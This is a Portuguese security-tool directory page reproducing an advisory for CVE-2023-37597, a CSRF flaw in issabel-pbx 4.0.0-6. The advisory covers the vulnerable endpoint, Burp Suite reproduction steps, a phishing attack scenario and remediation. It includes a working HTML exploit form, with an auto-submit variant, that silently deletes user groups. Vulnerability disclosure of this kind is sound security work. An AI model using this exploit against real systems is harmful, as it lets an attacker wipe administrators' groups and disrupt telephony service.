Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-37597 — Issabel-pbx v 4.0.0-6 contém uma vulnerabilidade de Cross-Site Request Forgery (CSRF) na sua funcionalidade de gerenciamento de grupos de usuários. | Kitploit
Ferramentas/GitHubGitHub/sahiloj/cve-2023-37597
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoPapers e PesquisaAprendizado e Educação
GitHubsahiloj/cve-2023-37597

CVE-2023-37597

Issabel-pbx v 4.0.0-6 contém uma vulnerabilidade de Cross-Site Request Forgery (CSRF) na sua funcionalidade de gerenciamento de grupos de usuários.

Ver Repositório
11há 6 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2023-37597 — issabel-pbx 4.0.0-6: Falsificação de Solicitação entre Sites (CSRF) — Exclusão de Grupo de Usuários

Aviso legal: Este repositório destina-se exclusivamente a fins educacionais e de pesquisa de segurança autorizada. Não utilize este exploit contra qualquer sistema que você não possua ou para o qual não tenha permissão explícita por escrito para testar.


Sumário

  • Visão Geral
  • Detalhes da Vulnerabilidade
  • Produto Afetado
  • Análise Técnica
  • Cenário de Ataque
  • Prova de Conceito (PoC)
    • Passos para Reproduzir
    • Código do Exploit PoC
  • Impacto
  • Mitigação e Remediação
  • Cronograma de Divulgação
  • Referências
  • Autor

Visão Geral

issabel-pbx é uma plataforma de Comunicações Unificadas (PBX) de código aberto amplamente utilizada que fornece serviços VoIP, gerenciamento de telefonia e administração baseada na web. A versão 4.0.0-6 do issabel-pbx contém uma vulnerabilidade de na funcionalidade de gerenciamento de grupos de usuários.

Falsificação de Solicitação entre Sites (CSRF)

Um atacante remoto não autenticado pode criar uma página HTML maliciosa que, quando visitada por um administrador autenticado, envia silenciosamente uma solicitação HTTP POST forjada para excluir qualquer grupo de usuários. Como o aplicativo não valida a origem de solicitações que alteram o estado com tokens CSRF ou políticas de cookie SameSite, o navegador inclui automaticamente o cookie de sessão do administrador, fazendo com que a exclusão seja concluída sem o conhecimento ou consentimento da vítima.


Detalhes da Vulnerabilidade

CampoValor
ID CVECVE-2023-37597
VulnerabilidadeFalsificação de Solicitação entre Sites (CSRF)
CWECWE-352 — Falsificação de Solicitação entre Sites (CSRF)
GravidadeMédia
Vetor CVSSCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H
Versão Afetadaissabel-pbx 4.0.0-6
Divulgado em10 de julho de 2023
PesquisadorSahil Ojha

Produto Afetado

CampoValor
Nome do Produtoissabel-pbx
Versão4.0.0-6
FornecedorIssabel Foundation
Página do Fornecedorhttps://www.issabel.org/
Código-Fontehttps://github.com/IssabelFoundation/issabelPBX
Testado emWindows (Burp Suite Community Edition)

Análise Técnica

O que é CSRF?

Falsificação de Solicitação entre Sites (CSRF) é um ataque que engana o navegador da vítima para que ele envie uma solicitação autenticada ao aplicativo alvo em nome do atacante. O ataque é bem-sucedido quando:

  1. A vítima possui uma sessão autenticada ativa com o aplicativo alvo.
  2. O aplicativo depende exclusivamente de cookies de sessão para autenticar solicitações (ou seja, sem token CSRF, sem validação de Origin/Referer, sem atributo de cookie SameSite=Strict ou SameSite=Lax).
  3. O atacante consegue prever a estrutura da solicitação que altera o estado.

Causa Raiz

O endpoint de exclusão de Grupo de Usuários (/index.php?menu=grouplist) no issabel-pbx 4.0.0-6 processa solicitações HTTP POST que contêm apenas a ação delete e um parâmetro id_user. O aplicativo não:

  • Gera ou valida um token sincronizador (anti-CSRF).
  • Verifica os cabeçalhos HTTP Origin ou Referer.
  • Define o atributo SameSite nos cookies de sessão.

Como resultado, qualquer página da web carregada no navegador da vítima pode enviar silenciosamente o formulário de exclusão usando a sessão existente da vítima, pois o navegador anexará automaticamente o cookie de sessão.

Endpoint Vulnerável

root@kitploit:~
POST /index.php?menu=grouplist HTTP/1.1
Host: <Issabel IP>

delete=Delete&id_user=<USER_GROUP_ID>

Cenário de Ataque

  1. O atacante cria uma página HTML maliciosa contendo um formulário oculto que envia (POST) a solicitação de exclusão ao painel administrativo do Issabel.
  2. O atacante entrega a página a um administrador autenticado do Issabel — por e-mail de phishing, link em mensagem de chat ou um `` incorporado em uma página comprometida.
  3. O navegador da vítima carrega a página. O JavaScript envia o formulário automaticamente, ou a vítima é induzida por engenharia social a clicar em um botão falso "Submit".
  4. O servidor Issabel recebe uma solicitação POST válida com o cookie de sessão do administrador e exclui o grupo de usuários alvo sem qualquer confirmação adicional ou validação de token.
  5. O grupo de usuários é removido permanentemente, potencialmente interrompendo o roteamento de chamadas, os controles de acesso e todos os usuários que dependiam desse grupo — efetivamente causando uma negação de serviço no nível do aplicativo.

Prova de Conceito (PoC)

Aviso: O PoC a seguir é fornecido estritamente para fins educacionais. Utilize-o apenas em ambientes de laboratório ou sistemas para os quais você tenha autorização explícita.

Passos para Reproduzir

Passo 1 — Faça login no painel administrativo do Issabel

Navegue até a página de lista de Grupos de Usuários e faça login com credenciais de administrador.

root@kitploit:~
https://{Issabel IP}/index.php?menu=grouplist&action=view&id=11

Painel administrativo — Lista de Grupos de Usuários


Passo 2 — Capture a solicitação de exclusão

Tente excluir um grupo de usuários enquanto intercepta o tráfego pelo Burp Suite. Clique com o botão direito na solicitação POST capturada e selecione Engagement Tools → Generate CSRF PoC para gerar o esqueleto HTML do exploit.

Burp Suite — Solicitação DELETE capturada


Passo 3 — Hospede a página de exploit CSRF

Salve o HTML gerado como um arquivo (veja Código do Exploit PoC abaixo). Hospede-o em um servidor controlado pelo atacante ou envie-o diretamente à vítima.


Passo 4 — A vítima abre a página de exploit

Quando o administrador autenticado abre ou é redirecionado para a URL do exploit, o formulário oculto é enviado automaticamente (ou a vítima clica no botão de isca). O grupo de usuários alvo é excluído do painel administrativo.

Exploit enviado — grupo excluído (antes)

Exploit enviado — grupo excluído (depois)


Código do Exploit PoC

O seguinte arquivo HTML (também disponível como CSRF exploit.html) demonstra o ataque. Substitua {Issabel IP} pelo host alvo e ajuste id_user para corresponder ao ID do grupo que você deseja excluir.

root@kitploit:~
<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://{Issabel IP}/index.php?menu=grouplist" method="POST">
      <input type="hidden" name="delete" value="Delete" />
      <input type="hidden" name="id_user" value="7" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Variante de envio automático: Para eliminar a necessidade de a vítima clicar em qualquer coisa, adicione o seguinte dentro da tag <body> para que o formulário seja enviado automaticamente ao carregar a página:

root@kitploit:~
<script>document.forms[0].submit();</script>

Impacto

DimensãoDescrição
IntegridadeUm atacante pode excluir silenciosamente qualquer grupo de usuários do painel administrativo do Issabel.
DisponibilidadeA exclusão de grupos de usuários interrompe as regras de roteamento de chamadas, o controle de acesso e os serviços de telefonia de todos os usuários pertencentes a esses grupos, configurando uma negação de serviço parcial.
ConfidencialidadeNão é diretamente afetada por esta vulnerabilidade.

Mitigação e Remediação

Administradores e desenvolvedores devem aplicar as seguintes defesas:

  1. Implemente Tokens CSRF (Padrão de Token Sincronizador)

    • Gere um token único, imprevisível, por sessão (ou por solicitação) para cada formulário que altera o estado.
    • Valide o token no lado do servidor antes de processar qualquer operação POST/PUT/DELETE.
  2. Defina o Atributo de Cookie SameSite

    • Defina cookies de sessão com SameSite=Lax (mínimo) ou SameSite=Strict para impedir que solicitações entre origens carreguem credenciais de sessão.
    • Exemplo de cabeçalho de resposta: Set-Cookie: PHPSESSID=...; SameSite=Lax; Secure; HttpOnly
  3. Valide os Cabeçalhos Origin e Referer

    • No lado do servidor, rejeite solicitações cujo cabeçalho Origin ou Referer não corresponda ao domínio do próprio aplicativo.
  4. Exija Reautenticação para Ações Destrutivas

    • Solicite que o administrador confirme sua senha antes de excluir grupos ou realizar outras operações destrutivas.
  5. Aplique Defesa em Profundidade

    • Use uma regra de Web Application Firewall (WAF) para bloquear solicitações POST entre origens inesperadas em endpoints sensíveis.

Cronograma de Divulgação

DataEvento
10 de julho de 2023Vulnerabilidade descoberta e documentada por Sahil Ojha
10 de julho de 2023CVE-2023-37597 atribuído
10 de julho de 2023Divulgação pública

Referências

  • NVD — CVE-2023-37597
  • OWASP — Cross-Site Request Forgery (CSRF)
  • OWASP CSRF Prevention Cheat Sheet
  • CWE-352: Cross-Site Request Forgery (CSRF)
  • Issabel Foundation — issabelPBX

Autor

Sahil Ojha Pesquisador de Segurança

Se você achou esta pesquisa útil, sinta-se à vontade para ⭐ dar uma estrela no repositório.

Baixar ferramenta